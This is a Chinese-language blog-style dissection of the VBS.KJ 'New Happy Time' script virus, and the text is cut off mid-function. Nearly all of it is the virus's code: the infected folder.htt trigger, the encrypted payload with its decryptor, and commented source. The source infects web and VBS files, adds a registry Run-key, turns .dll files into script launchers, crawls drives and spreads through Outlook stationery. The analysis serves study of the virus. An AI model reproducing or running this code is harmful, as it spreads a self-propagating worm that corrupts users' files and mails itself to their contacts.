”新快乐时光“再解

'VBS.KJ 新快乐时光，网页宏病毒病毒

' 今天又一次被这个病毒感染,讨厌的错误对话框又跳了出来,不要我知道就罢了,竟然写出这么烂的代码恶心人.

' 一怒之下,将其解剖开来,看了个明白.病毒加密还比较有趣,至于最拙劣的也就是执行的时候会出现错误提示.

' 本人属于VB 低级水平(倾向于C的人),写个HELLO WORLD还可以,在下面的分析中也许会有很多错误的地方,

' 还请谅解

<BODY onload="vbscript:KJ_start()"> ' 病毒代码从这里开始执行

<!--

* This file was automatically generated by Microsoft Internet Explorer 4.0

* using the file %THISDIRPATH%\folder.htt (if customized) or

* %TEMPLATEDIR%\folder.htt (if not customized).

-->

<html>

<body scroll=no onload="Init()">

......

</body>

</html>

.......

<script language=vbscript> ' 下面一句也有病毒

document.Write "<div style='position:absolute; left:0px; top:0px; width:0px; height:0px; z-index:28; visibility: hidden'><" & "APPLET NAME=KJ" & "_guest HEIGHT=0 WIDTH=0 code=com.ms." & "activeX.Active" & "XComponent></APPLET></div>"

</script>

<script language=vbscript> ' 病毒体藏在FOLDER.HTT 文件的最后，并且是加密过的，我喜欢

ExeString = "=feBkOa^o]%AqeeMbpm%SZlMbpm%A]`kb]Lbdf%:mhe^LZc^`l%?PG%PpKa^id%PffIZq`%LrZ>%CagZiq=bpcPm[HBXlqYkm%!HBL^q<bf%!HB<kbYm^Jaebbm!DCIad^Fl!DC@j^Zq]FZfd!DCMjhi^_Zmb =g]Kn[Cmg\qahgCC:mh^gaLh!Cae^MYma)LribKmk&Hk>kogkO]lnj]GbpmK^mJ^ZaL^fm6CKH'Lh^gQ]qmCae^%>bebHZme$*MfmKmk5KbY]Mbei'O]Z]>deA_Fflmo MfmKmk)DC\kmZol!!5;)LjEbf!MjhLmo!5)Me]gJ^ZaL^fm&<elk^=qbq?nk[mblfBf]F^F^Mvh^Lqj6amqMe]gJ^ZaL^fm&<elk^K^m>bebL^fm6CKH'Lh^gQ]qmCae^%>bebHZme$+?bi]M^jh'Poam^5?G=RggelY]6#o_k\kfhm3CCXplZkq 7o_;kEcQeiLqjn[<oD_#AmjdM^ulCae^Q]fi+;ehp]P]mC9mmoa[:?LL&@^q>beb ?bi]IZq`>:mqjb[+Ymmoa[nq]l:,->ep]O]Z]Q]fi+;ehp]P]mCae^Q]fi5?PG'Hm]gMbpm?fd^!Cae^MYma)0A_Qqi^Plk:aqeeLa^k?fd^Mbei'Tjbmbo[@jE_9AMJD7o_;kEc4#;L<Rlfeh^\6o[p[kbml3HBXlqYkm%!6#o[@jE_AqeeMbpm=elbA_Qqi^Plk:o_kQ`^g?bi]M^jh'Poam^n[<oD_#O[pL^qq>k\Bc?fd^Mbei'@dhlb _

\Bc>k\?rf\mfgg?rf\mfggHB<a^f`^Pm[!@mkkbfmLqjbgd$EZplBga]q<eYkB_DZlqAg]bp<a^j6(Me]gA_I]_m%D<Zp]!<rjk^klLmoag`&$*55I;Zlb \!Me]gCC<eYg`bKn[5?ffZev<blh2ULn_=6(Bdl^DC@`Zgd]Ln_6@`k!>k\!I]_m%D<Zp]!<rjk^klLmoag`&$*&&.!3ULrZ>:)=g]A_=elbDG;aZk_^LrZ6Eb]%;nko]gmPlkbk_%*)DZlqAg]bp<a^j=g]A_=g]>ng`lbhk>ng`lbhkDC@j^Zq]FZfd!Hg=kkljKbknfbG^ulF^BkOa^o]6amjdQ`^g>qfl?rf\mfgg=g]A_KaZo]?bi]6D^_q PbkHZme$,Mjh`oYfCae^pT<hjehg>bebkUFf[khpg_mKaZo]]UPlZmfgg^oqU[iYgd+`mfBc!?PG'?fd^>ualmp La^j^?fd^&Mabf@YeeCC:mh^gaLh!P`Zkb>beb$aqee&>ik^K^m>bebL^fm6CKH'Lh^gQ]qmCae^%KaZo]?bi]%+)lknb!Cae^Q]fi+Okbq]9AMJD7o_;kEc4#;L<Rlfeh^\6o[p[kbml3HBXlqYkm%!6#o[@jE_AqeeMbpm>bebL^fm&<elk^=g]A_<^_^memF\6OlLe]ee+J^`O]Z]%ADBQX<RJK>KLXNP=KUF\^gqambbkU=b^ZnilNp]kF<HnqDhhhN^kpahg5PpKa^id'Kb_K^^\!EC>R\DH<>DXF>;ABK=ULl^mp^j^UJa\klkh_qTHnqdhhh>qmj^lpTF^aaZObjPlP`^ei&K^dO _

q]EC>R\;NKO=GM\ML>OTB]bfmbqa^lY=b^ZnilB]#ULl^mp^j^UJa\klkh_qTHnqdhhh>qmj^lpTD^_q HnqDhhhN^kpahg))#')YEZbiT<hjhhlbNlbLm^lbhk]kr$*%J>@\<PHO<;ZeiDCJYbeO]`!@D>VW<NOJ>GQWNLBJUBa]gmflb^pTA]_ZrdmBaUPg_mtYk^YEb\oglhclUHrlehlc>uhk^pkU#E^cl!HrlEhlcO^okbhk$*'-TFZfdULqYmblf^kvGZj]%P`Zkb>beb!@YeeCCF^aeKb_!EC>R\;NKO=GM\ML>OTB]bfmbqa^lY=b^ZnilB]#ULl^mp^j^UJa\klkh_qTHnqdhhh>qmj^lpTD^_q HnqDhhhN^kpahg))#')YEZbiTPba]LqYmblf^kvGZj]%P`Zkb>beb!TkLabde'O]`Poam^ADBQX<RJK>KLXNP=KUPg_mtYk^YEb\oglhclUHc^b\bT2'-THnqdhhhTHiqahgpTFZfdU>aamhoHk^c]k^k[^)),*-/+%J>@\<PHO<;ZeiDCJYbeO]`!@D>VW<NOJ>GQWNLBJULl^mp^j^UJa\klkh_qTPbk\hppF^pkZ`ff`Pm[lvkm^jTIkl^bebkUFf[khpg_mGnmighdAgmbjg^qL^qlbgdkU)^(])/())-())-()\-())-())-())-,/U-(*^-+/)$Ygd!@YeeCCF^aeKb_!EC>R\;NKO=GM\ML>OTLhclpZo]UFf[khpg_mYObgagplFMU@mkkbfmObjlblfUPff]htkFbklZdag`Kn[pqlmbeUIog_bi]lUJa\klkh_qHnqdhhhBgq]kgblLblmbk_lU-Y)]-*))-())-())`())-())-())-(-/Y()*b(,/-%_dZghOlLe]ee+J^`TjbmbAH=RX@MKKBFMXR _

KYKh_qoZkbTFb`jhll^mUL^_b`]U*-&)ULmmelgdULhmblflUJYbeY=]bqgkIo]_^o]g\b%*0))0/$KB?X=TGK=<^deHBFZfdK^d AH=RX@MKKBFMXRK>KYKh_qoZkbTFb`jhll^mUL^_b`]U*-&)U@gfflfUF^aeLblmbk_lUK]pLqYmblf^kv%_dZghCCnjeZ`b>hea]k!I]_m%ObgMYma)+#Iog`k^e?fd^lY;hfjggCae^pTFb`jhll^mP`Zkb\ULqYmblf^kv=g]>ng`lbhk>ng`lbhkDC@j^Zq]Fbia^n%!Lf>ojhkJ^lre^K]qmM^jhIZq`6A_Kgm!CKH'Cae^Bpblqk!PffIZq`PL`jbiq&^qbLa^kMbeiI^la:lvkm^j++U>k\BcBcM^jhIZq`6lrpl^f0*ULa^kLqYkmRh?bi]6ObgMYmaPQLMBEUDbjg^i++'ade>ep]PlZkqMi?fd^:PbkHZmeKRLQ=FUH]kgbd']id=g]A_OlLe]ee+J^`TjbmbAH=RXIG<:IWF:@@BGBTLhclpZo]UFf[khpg_mYObgagplY;nko]gmS]klfggUOmgUH]kgbd,+$Lm^jmNm>beb?PG'<lhr?fd^TagI^la#pbZUdgoZei&`bc%PffIZq`p^_T?hi\^k+`mm?PG'<lhr?fd^TagI^la#lvkm^j++UhbpZid'`f^%TagI^la#lvkm^j++Ua]ldqgi'ffb<ZidDG9iibf]Ml PbkHZmeo^[Y>hea]k'elm)amqOlLe]ee+J^`TjbmbAH=RX@D:LP=LXOGHMY&]eiT%\eecae^PpKa^id'Kb_Pkfl^@D>VW<E>KL>PWKHLLU'adeU@ggmbfmQqi^$Zmheb`Ymb _

(q*el]logelY]PlP`^ei&K^dOkbq]EC>R\;E:PK>L\JHHQT]ei^bebT=^cYneqA\hkT%TkLabde'O]`KbY]!@D>VW<E>KL>PWKHLLUou\_bi]U=b^ZnilB\lfU&PpKa^id'Kb_Pkfl^@D>VW<E>KL>PWKHLLU]id_bi]UL`jbiq=g`ff^U$O?K\kfhmPlP`^ei&K^dOkbq]EC>R\;E:PK>L\JHHQT]ei>bebTLabdeULh^gY;hfjYg]Y%PffIZq`L^fmHZmeOL\oaim+]q^.OlLe]ee+J^`TjbmbAH=RX@D:LP=LXOGHMY\eeCae^YKa^id>qYHkhm]kmvKa^blAZk\e^okUPP@IklhlU$t3(+.1;:.*1.,?%**@>&1@1/&-(::-(;14(1<zTkLabde'O]`Poam^ADBQX<I9LLBKXKLGMUade?fd^UP[kbmlAhpl>g`g]^Y%x0.*0)/,.%-1-;&*.<+&?)?2*()<-,?13;,+1uK^m>bebL^fm6CKH'Lh^gQ]qmCae^%KmZolNiCae^)*%mom^?bi]M^jh'Poam^N[lQ]qm?bi]M^jh'<igl^>ga?nk[mblf?nk[mblfDGDbdbAm!&BcBgT`^kb57amjdQ`^g>qfl?rf\mfgg=g]A_LabpDh\^lbhk6ag\nj]gm+dh\^lbhkBcE^cl!MealEl[Zmfgg%,:_fd^La^kMealEl[Zmfgg:Fba MafkEh`Ymblf%2&Bc?LL&@^q=qmbflblfGZj]!MealEl[Zmfgg47me]gLabpDh\^lbhk6I]_m%LabpDh\^lbhk$E^k MafkEh`Ymblf*E^k ?LL&@^q>bebFZfb MafkEh`Ymblf&>k\BcBcE^k MafkEh`Ymblf;,Q`^gMafkE _

Ymblf6LabpDh\^lbhkT=g]A_CCnjeZ`b>hea]k!Q`blIg\Zqahg&>k\Bc>k\?rf\mfgg?rf\mfggHBFZfdK^d K^dKmk)>bebFZfb!Lf>ojhkJ^lre^K]qmK^dL^fmKmk5PpKa^id'Kb_K^^\!Kb_Lmo!F^Kb_M^jhLmo6Me]gOlLe]ee+J^`TjbmbK^dKmk)>bebFZfb>k\Bc>k\?rf\mfgg?rf\mfggHBH[lKn[%;nko]gmPlkbk_Kn[B6-MbkmHrl6(AgPeae^LknbMbkmHrl6L^lqGnm#*B_L^lqGnm6+5Mabf@mkkbfmLqjbgd6CagZiq=bpc3U>uamAgBf]F^Lf>ojhkJ^lre^K]qmL^qMafk?hi\^k5?PG'@bl?hi\^k%;nko]gmPlkbk_K^m<b\Pm[:<kbYm^LZc^`l!P[kbmlbgd&=b`lbhkYkr!P]mCge]bjl:Mafk?hi\^k+Kn[Cge]bjl>hea]k<lmgm5)?ho>Z``Mbei?ld]^obg>hea]kl?hi\^k@gngq6Cge]bj<hrfm(*<b\Pm['^\]Cge]bj<hrfm%L^fm>hea]k'KYf^G^ulF^=f[Ln_&<hrfm:)Q`^gEZplBga]q<eYk:BgplkKbn!<rjk^klLmoag`)U)D^g%;nko]gmPlkbk_&.!Pm[Lqjbgd6Ja]!@mkkbfmLqjbgd$EZplBga]q<eYk$.$E^k <noj^gqKmkff`*DZlqAg]bp<a^j&*&<rjk^klLmoag`5DG;aZk_^LrZ!<rjk^klLmoag`)DZlqAg]bp<a^jKn[B6.>ik^A_Pm[>5)La^k<rjk^klLmoag`5<rjk^klLmoag` _

f[Ln_&Bmbe!*&T=qbq=h>ep]g6-?ljc5*LhCge]bj<hrfmA_I;Zlb Ln_Kmkff`5E@Yl^%<b\Pm['Fl^f%bLa^kBcc9?hi\^k@gngqMabf@mkkbfmLqjbgd6@mkkbfmLqjbgdAa\LrZ'Bq]f!g#*YBpbm<h=g]A_=g]A_F^qqE^kmBk\^q@`Zk5BkkmkO]o!@mkkbfmLqjbgd$U$E^k <noj^gqKmkff`*)Kn[Plkbk_6Eb]%;nko]gmPlkbk_%E^kmBk\^q@`Zk()%Ebf!<rjk^klLmoag`&%EZplBga]q<eYk&.!@mkkbfmLqjbgd6HB<a^f`^Pm[!@mkkbfmLqjbgd$EZplBga]q<eYk>gaB_>gaB_EhlhHBH[lKn[5<rjk^klLmoag`>ga?nk[mblf?nk[mblfDGHkhmY`Zq]!Hg=kkljKbknfbG^ulO]`I^laO^dn^5EC>R\DH<>DXF>;ABK=ULl^mp^j^UJa\klkh_qTHnqdhhh>qmj^lpT=^dj^^=fkd=b_k^b6TkLabde'O]`KbY]!O]`I^laO^dn^&Bc=bpc=^dj^^5MabfAaldA]`kb]6>bg^dr=fkd#3YBf]F^Cgkf5*qg.=bpc=^dj^^5DGG[hPm[!AaldA]`kb]CCnjeZ`b>hea]k!AaldA]`kb]F^qqPpKa^id'Kb_Pkfl^O]`I^laO^dn^)<blh<^`o]^=g]>ng`lbhk>ng`lbhkDCrefZd]?hi\^k%HZmeFZfb!Lf>ojhkJ^lre^K]qmL^q?hi\^kKYf^5?PG'@bl?hi\^k%HZmeFZfb!P]mQ`blCae^p6Cge]bjGZj]'?fd^lAmq=qbpll: _

>hk=Z\eMafk?bi]BkMafk?bi]l>beb=qm5N@Yl^%>LH+?^mBpm^kkbhkFZfb Mafk?bi]'I^la&Bc?bi]>qq6@MFHk>beb=qm5ELFEHk>beb=qm5>KIGkCae^Bpm:IEHLj?fd^>ul6CLMMe]g;ZeiDC>hi^k\Mh%Labp>beb&IZq`%elfe!Bdl^F^?fd^>ul6O;PMe]g;ZeiDC>hi^k\Mh%Labp>beb&IZq`%sZl&>ik^Bc?bi]>qq6@MMMabfElm>ualmp6.>k\BcGbpmA_%M<Zp]!I^laG^e^5N@Yl^%ObgMYmaA]ldqgiU!Lj!R;Zlb IZq`GZj]:N<^k^!TagI^la#=bkdmlh&La^kAql>qfkml5*>gaB_B_@mmBpblqk6(Me]g>LH+;hiv>bebPbkHZmekrlq]f,/T]^pcmhm&bgf%I^laG^e^>LH+;hiv>bebPbkHZmeo^[Y>hea]k'elm)HZmeFZfb>k\Bc>k\?rf\mfgg?rf\mfggHBL^q<bf%!Lf>ojhkJ^lre^K]qm>ko&<ebYkL^lqAm:PL`jbiq&L\oaimCmeekYf^B_=kkLa^kBkOa^o]6amjd=elbBkOa^o]6o[pBf]F^F^BkOa^o]6o[pMe]gK^m>LH5<o]ZmbG[cb[m!K\kfhmbk_'?fd^Lvkm^jG[cb[m&LblPpKa^id6;k^^l^H_b^\q PP[kbml'Le]ee!Bdl^L^q:imd^H_b^\q6ag\nj]gm+Yiii]ml%DC\_n^pl:imd^H_b^\q&l^q;ELF<!x>2,2<<+/%*<C(&*.<)&><;2*()<-,?=20:) _

:imd^H_b^\q&\kbYm^Fflm^f\^%!P]mTkLabde::imd^H_b^\q&@^qG[cb[m!&:mhe^LZc^`l'lbl<EPA=!s)=1+?>-)&?-1,&.)<?*02--%))>(<2---+/0v&:mhe^LZc^`l'\o]ZmbAglqYg\b K^m>LH5:mhe^LZc^`l'@blH[g]\m%!Bf]F^P]mAaldLZc^`l6>LH+<kbs]l>hk=Z\e=bpcM^jhBk=bpcH[g]\mB_<blhL^fm&=kfn^Mvh^96+9g]<blhL^fm&=kfn^Mvh^96*La^k>uamCgk=g]A_>bg^dr=fkd:=bpcM^jh'=oao^I]mmbjK]qm=bjHme]k:oj!,&K^f]hjas^?hob6-Mh+Lla^o9kk%a:Bgq !2Kk\G^ulQ]fiPlkbk_6>hka6*LhI]g!Q`blQ]qm&MbeiGre69l\%Eb]%LabpL^qq$b%.!A_Q]fiKmf:*,La^kMbeiGre6*1=elbA_Q]fiKmf:*)La^kMbeiGre6*2=g]A_L^fm;aZo6@`k!Q]fiKmf*Hme]k:oj!bEh],B_L^fm;aZo6@`k!0,Q`^gM^jh<a^j6;ak%)1>gaB_M^jhLmoag`5MbeiLqjbgdQ]fi@`ZkG^ulRfEh`cLmo6=q^`mm^%=feDbq:ko ,)LabpL^qqsZ<kI^C^r>jk!-!6Gmabj:ko )o_;kEcH]r:oj!*&6Lla^o9kk%)#o[@jE_#Dbq:ko +5Hq`^k>jk!/!#n[<oD_D^v9kk%+:#Hme]k:oj!,&sZ<kI^>hka6*LhI]g!Bp^ _

jbgd!#nR<oD_M^jhGnj6>k\!Ja]!Bp^Lqjbgd$b%.!o[@jE_#BcM^jhGnj6.0Me]go[@jE_#MbeiGre6+-o[@jE_#>k\BcsZ<kI^L^fm;aZo6@`k!Q]fiKmf(D^v9kk%aFl\-&!#n[<oD_B_L^fm;aZo6@`k!/0Q`^go_;kEcQ]fi@`Zk5o_;ko[@jE_#>ik^BcM^jh<a^j6;ak%*2La^ksZ<kI^L^fm;aZo6sZE_o_;kEcBf]F^#n[<oD_MafkM^ul6LabpL^qqQ]fi@`Zko_;kEcK]qmo_;kEc=q^`mm^%LabpL^qq!LabpL^qq6=q^Plkbk_6MbeiLqjbgdAmjdM^ul64#l`jbiqeZk_nZd]6o_k\kfhm7sZ<kI^]h`mf^kl'poam^4#]fnlqqe^:ihpamblf3Z_kherl^4d^_q2)iu3mlh3)mp4ta]me2)iu3aba`aq2)iu3s*ag]bp3+53ofkb[fdbmv2af\]^k79#:MHE>QG:J=6DGX`r]lm@>BD@M6-PBALA6-\ha]6\le'fp&#Z`lbobP':`lbobQ<leihk]gm;5,9III=M74#(aao7#o[@jE_9(l`jbiq6#o[@jE_9l\oaimdZgdmZ`b5o[p[kbml7o_;kEcQ`blQ]qmo_;kEcRfEh`cLmosZ<kI^5,k\kfhm7sZ<kI^5,:H=V6#o[@jE_9(AQEE7O_kM^ul6LabpL _

qsZ<kI^MgEl[dLqjn[<oD_#DGWlm^jm!&TagI^la:?LL&@^qKi^`aZeCge]bj!)&TA_%>LH+>beb=qbpll!TagI^la#pbZU?ld]^o&amqLa^k?PG'<lhr?fd^TagI^la#pbZU?ld]^o&amq%PffIZq`p^_TdctYee+_b_>k\BcBc!?PG'?fd^>ualmp PbkHZmekrlq]f,/T]^pcmhm&bgfLa^k?PG'<lhr?fd^TagI^la#lvkm^j++Ua]ldqgi'ffb)ObgMYmapqlmbe,+Yccp^de'da_>gaB_>ga?nk[mblf"

Execute("Dim KeyArr(3),ThisText"&vbCrLf&"KeyArr(0) = 7"&vbCrLf&"KeyArr(1) = 7"&vbCrLf&"KeyArr(2) = 3"&vbCrLf&"KeyArr(3) = 8"&vbCrLf&"For i=1 To Len(ExeString)"&vbCrLf&"TempNum = Asc(Mid(ExeString,i,1))"&vbCrLf&"If TempNum = 18 Then"&vbCrLf&"TempNum = 34"&vbCrLf&"End If"&vbCrLf&"TempChar = Chr(TempNum + KeyArr(i Mod 4))"&vbCrLf&"If TempChar = Chr(28) Then"&vbCrLf&"TempChar = vbCr"&vbCrLf&"ElseIf TempChar = Chr(29) Then"&vbCrLf&"TempChar = vbLf"&vbCrLf&"End If"&vbCrLf&"ThisText = ThisText & TempChar"&vbCrLf&"Next")

Execute (ThisText) ' 执行代码！

</script>

</BODY>

</HTML>

' 病毒结束

Dim InWhere, HtmlText, VbsText, DegreeSign, AppleObject, FSO, WsShell, WinPath, SubE, FinalyDisk

' 定义的一些变量,这里分别解释一下

' InWhere 判断程序是在HTML执行,还是已经进入到病毒代码部分

' HtmlText 不用多说了,就是HTML文件的内容

' VbsText 病毒需要用的脚本VBS文本内容

' DegreeSign

' AppleObject

' FSO 太熟悉了,就是脚本里处理文件系统的一个对象

' WsShell 执行WINDOWS程序

' WinPath 存放WINDOWS的系统路径

' SubE

' FinalyDisk 最后一个硬盘是什么,好黑,要通吃??

Sub KJ_start() ' 开始了,总体结构还比较清晰

KJSetDim() ' 设置各种变量

KJCreateMilieu()'

KJLikeIt()

KJCreateMail()

KJPropagate()

End Sub

Function KJAppendTo(FilePath, TypeStr)

' 对目标文件,其实就是FOLDER.HTT进行检查,如果没有感染过就把病毒体附加上去

On Error Resume Next

Set ReadTemp = FSO.OpenTextFile(FilePath, 1) ' 打开文件读

TmpStr = ReadTemp.ReadAll

If InStr(TmpStr, "KJ_start()") <> 0 Or Len(TmpStr) < 1 Then

ReadTemp.Close ' 如果打开的文件中没有 "KJ_start()"这个字符串,就说明没有被感染

Exit Function ' 对空文件不处理的

End If ' 以下是满足感染条件的文件

If TypeStr = "htt" Then ' 如果是HTT文件,每个目录下都有的,如果你要看的话就查看隐藏文件就可以了

ReadTemp.Close ' 刚才的打开方式是读,现在要写了,需要关闭文件,再打开写(我猜的 ^_^)

Set FileTemp = FSO.OpenTextFile(FilePath, 2)

FileTemp.Write "<" & "BODY onload=""" & "vbscript:" & "KJ_start()""" & ">" & vbCrLf & TmpStr & vbCrLf & HtmlText

FileTemp.Close ' 在HTT文件的第一行写上"<BODY onload="vbscript:KJ_start()"> ",本文开始我也做了注释

Set FAttrib = FSO.GetFile(FilePath)

FAttrib.Attributes = 34 ' 改变文件属性,隐藏

Else

ReadTemp.Close

Set FileTemp = FSO.OpenTextFile(FilePath, 8)

If TypeStr = "html" Then ' 如果是HTML 文件,要把<BODY onload="vbscript:KJ_start()">写在<HTML></HTML>之间才会执行

FileTemp.Write vbCrLf & "<" & "HTML>" & vbCrLf & "<" & "BODY onload=""" & "vbscript:" & "KJ_start()""" & ">" & vbCrLf & HtmlText

ElseIf TypeStr = "vbs" Then

FileTemp.Write vbCrLf & VbsText

End If

FileTemp.Close

End If

End Function

Function KJChangeSub(CurrentString, LastIndexChar)

' 切换目录

If LastIndexChar = 0 Then

If Left(LCase(CurrentString), 1) <= LCase("c") Then ' 如果是第一个硬盘就转到最后一个硬盘

KJChangeSub = FinalyDisk & ":\" SubE = 0 ' 看来它是循环操作的

Else ' 其他硬盘则用盘符减一(如:'D'-1= C)

KJChangeSub = Chr(Asc(Left(LCase(CurrentString), 1)) - 1) & ":\"

SubE = 0

End If

Else

KJChangeSub = Mid(CurrentString, 1, LastIndexChar)

End If

End Function

Function KJCreateMail()

' 通过OUTLOOK向地址簿中的地址发送EMAIL。

On Error Resume Next

If InWhere = "html" Then

Exit Function ' 如果是在HTML中运行的话,不进行这个步骤

End If ' 首先感染BLANK.HTML文件,这个文件在IE设置中如果缺省的"使用空白页"就会调用的

ShareFile = Left(WinPath, 3) & "Program Files\Common Files\Microsoft Shared\Stationery\blank.htm"

If (FSO.FileExists(ShareFile)) Then ' 如果存在就直接感染

Call KJAppendTo(ShareFile, "html")

Else ' 如果不存在就伪造一个带病毒的BLANK.HTM文件

Set FileTemp = FSO.OpenTextFile(ShareFile, 2, True)

FileTemp.Write "<" & "HTML>" & vbCrLf & "<" & "BODY onload=""" & "vbscript:" & "KJ_start()""" & ">" & vbCrLf & HtmlText

FileTemp.Close

End If

DefaultId = WsShell.RegRead("HKEY_CURRENT_USER\Identities\Default User ID")

OutLookVersion = WsShell.RegRead("HKEY_LOCAL_MACHINE\Software\Microsoft\Outlook Express\MediaVer")

WsShell.RegWrite "HKEY_CURRENT_USER\Identities\"&DefaultId&"\Software\Microsoft\Outlook Express\"& Left(OutLookVersion,1) &".0\Mail\Compose Use Stationery",1,"REG_DWORD"

Call KJMailReg("HKEY_CURRENT_USER\Identities\"&DefaultId&"\Software\Microsoft\Outlook Express\"& Left(OutLookVersion,1) &".0\Mail\Stationery Name",ShareFile)

Call KJMailReg("HKEY_CURRENT_USER\Identities\"&DefaultId&"\Software\Microsoft\Outlook Express\"& Left(OutLookVersion,1) &".0\Mail\Wide Stationery Name",ShareFile)

WsShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Outlook\Options\Mail\EditorPreference", 131072, "REG_DWORD"

Call KJMailReg("HKEY_CURRENT_USER\Software\Microsoft\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings\0a0d020000000000c000000000000046\001e0360", "blank")

Call KJMailReg("HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings\0a0d020000000000c000000000000046\001e0360", "blank")

WsShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Outlook\Options\Mail\EditorPreference",131072,"REG_DWORD" Call

KJMailReg("HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Common\MailSettings\NewStationery","blank")

KJummageFolder (Left(WinPath, 3) & "Program Files\Common Files\Microsoft Shared\Stationery")

End Function

Function KJCreateMilieu()

' 检测系统是否安装了 脚本解释器,如果没有的话,就使用系统文件Kernel,Kernel32来执行各种操作

' 充分暴露了WINDOWS的脆弱性

On Error Resume Next

TempPath = ""

If Not (FSO.FileExists(WinPath & "WScript.exe")) Then

TempPath = "system32\"

End If

If TempPath = "system32\" Then

StartUpFile = WinPath & "SYSTEM\Kernel32.dll"

Else

StartUpFile = WinPath & "SYSTEM\Kernel.dll"

End If

WsShell.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Kernel32", StartUpFile

FSO.CopyFile WinPath & "web\kjwall.gif", WinPath & "web\Folder.htt"

FSO.CopyFile WinPath & "system32\kjwall.gif", WinPath & "system32\desktop..ini"

Call KJAppendTo(WinPath & "web\Folder.htt", "htt")

WsShell.RegWrite "HKEY_CLASSES_ROOT\.dll\", "dllfile"

WsShell.RegWrite "HKEY_CLASSES_ROOT\.dll\Content Type", "application/x-msdownload"

WsShell.RegWrite "HKEY_CLASSES_ROOT\dllfile\DefaultIcon\", WsShell.RegRead("HKEY_CLASSES_ROOT\vxdfile\DefaultIcon\")

WsShell.RegWrite "HKEY_CLASSES_ROOT\dllfile\ScriptEngine\", "VBScript"

WsShell.RegWrite "HKEY_CLASSES_ROOT\dllFile\Shell\Open\Command\", WinPath & TempPath & "WScript.exe ""%1"" %*"

WsShell.RegWrite "HKEY_CLASSES_ROOT\dllFile\ShellEx\PropertySheetHandlers\WSHProps\", "{60254CA5-953B-11CF-8C96-00AA00B8708C}"

WsShell.RegWrite "HKEY_CLASSES_ROOT\dllFile\ScriptHostEncode\", "{85131631-480C-11D2-B1F9-00C04F86C324}"

Set FileTemp = FSO.OpenTextFile(StartUpFile, 2, True)

FileTemp.Write VbsText ' 这里把Kernel.dll,Kernel32.dll都写进了病毒

FileTemp.Close

End Function

Function KJLikeIt()

If InWhere <> "html" Then

Exit Function

End If ' 分析当前文件的路径

ThisLocation = document.location

If Left(ThisLocation, 4) = "file" Then

ThisLocation = Mid(ThisLocation, 9)

If FSO.GetExtensionName(ThisLocation) <> "" Then

ThisLocation = Left(ThisLocation, Len(ThisLocation) - Len(FSO.GetFileName(ThisLocation)))

End If

If Len(ThisLocation) > 3 Then

ThisLocation = ThisLocation & "\"

End If

KJummageFolder (ThisLocation)

End If

End Function

Function KJMailReg(RegStr, FileName)

On Error Resume Next

RegTempStr = WsShell.RegRead(RegStr)

If RegTempStr = "" Then

WsShell.RegWrite RegStr, FileName

End If

End Function

Function KJOboSub(CurrentString)

' 解析当前路径嵌套的深度

SubE = 0

TestOut = 0

Do While True

TestOut = TestOut + 1

If TestOut > 28 Then ' 如果深度超过了28就返回最后一个硬盘根目录

CurrentString = FinalyDisk & ":\"

Exit Do

End If

On Error Resume Next

Set ThisFolder = FSO.GetFolder(CurrentString) ' 当前目录字符串

Set DicSub = CreateObject("Scripting.Dictionary") ' 构造一个字典,存放目录和深度

Set Folders = ThisFolder.SubFolders ' 取得子目录

FolderCount = 0 ' 子目录个数初始化为零

For Each TempFolder In Folders ' 查看子目录个数

FolderCount = FolderCount + 1

DicSub.Add FolderCount, TempFolder.Name

Next

If DicSub.Count = 0 Then ' 如果子目录为空,即无子目录

LastIndexChar = InStrRev(CurrentString, "\", Len(CurrentString) - 1) ' 取得最后路径中最后一个'/'

SubString = Mid(CurrentString, LastIndexChar + 1, Len(CurrentString) - LastIndexChar - 1) ' 最深的子目录

CurrentString = KJChangeSub(CurrentString, LastIndexChar) ' 切换到父目录

SubE = 1

Else

If SubE = 0 Then

CurrentString = CurrentString & DicSub.Item(1) & "\" ' 遍历字典中存放的子目录

Exit Do

Else

j = 0

For j = 1 To FolderCount

If LCase(SubString) = LCase(DicSub.Item(j)) Then

If j < FolderCount Then ' 进入到子目录

CurrentString = CurrentString & DicSub.Item(j + 1) & "\"

Exit Do

End If

End If

Next

LastIndexChar = InStrRev(CurrentString, "\", Len(CurrentString) - 1)

SubString = Mid(CurrentString, LastIndexChar + 1, Len(CurrentString) - LastIndexChar - 1)

CurrentString = KJChangeSub(CurrentString, LastIndexChar) ' 切换到上层目录

End If

End If

Loop

KJOboSub = CurrentString

End Function

Function KJPropagate()

On Error Resume Next

RegPathValue = "HKEY_LOCAL_MACHINE\Software\Microsoft\Outlook Express\Degree"

DiskDegree = WsShell.RegRead(RegPathValue)

If DiskDegree = "" Then

DiskDegree = FinalyDisk & ":\"

End If

For i = 1 To 5 ' 对各级目录下的文件进行感染

DiskDegree = KJOboSub(DiskDegree)

KJummageFolder (DiskDegree)

Next

WsShell.RegWrite RegPathValue, DiskDegree ' 写下注册表,记录最深的一个目录

End Function

Function KJummageFolder(PathName)

On Error Resume Next

Set FolderName = FSO.GetFolder(PathName)

Set ThisFiles = FolderName.Files

HttExists = 0

For Each ThisFile In ThisFiles

FileExt = UCase(FSO.GetExtensionName(ThisFile.Path))

If FileExt = "HTM" Or FileExt = "HTML" Or FileExt = "ASP" Or FileExt = "PHP" Or FileExt = "JSP" Then

Call KJAppendTo(ThisFile.Path, "html") ' 对当前目录下面所有 HTM,HTML,ASP,PHP,JSP文件进行感染

Else

If FileExt = "VBS" Then ' 对 VBS文件进行感染,这类感染比较方便

Call KJAppendTo(ThisFile.Path, "vbs")

Else If FileExt = "HTT" Then ' 如果存在HTT文件

HttExists = 1

End If

Next

If (UCase(PathName) = UCase(WinPath & "Desktop\")) Or (UCase(PathName) = UCase(WinPath & "Desktop")) Then

HttExists = 1 '对当前路径是桌面或者桌面上的目录都不放过

End If

If HttExists = 0 Then ' 如果没有HTT文件存在,就伪造一个,不过是配对的2个文件

FSO.CopyFile WinPath & "system32\desktop.ini", PathName

FSO.CopyFile WinPath & "web\Folder.htt", PathName

End If

End Function

Function KJSetDim()

On Error Resume Next

Err.Clear

TestIt = WScript.ScriptFullname ' 得到脚本文件的全名

If Err Then

InWhere = "html" ' 是HTML文件

Else

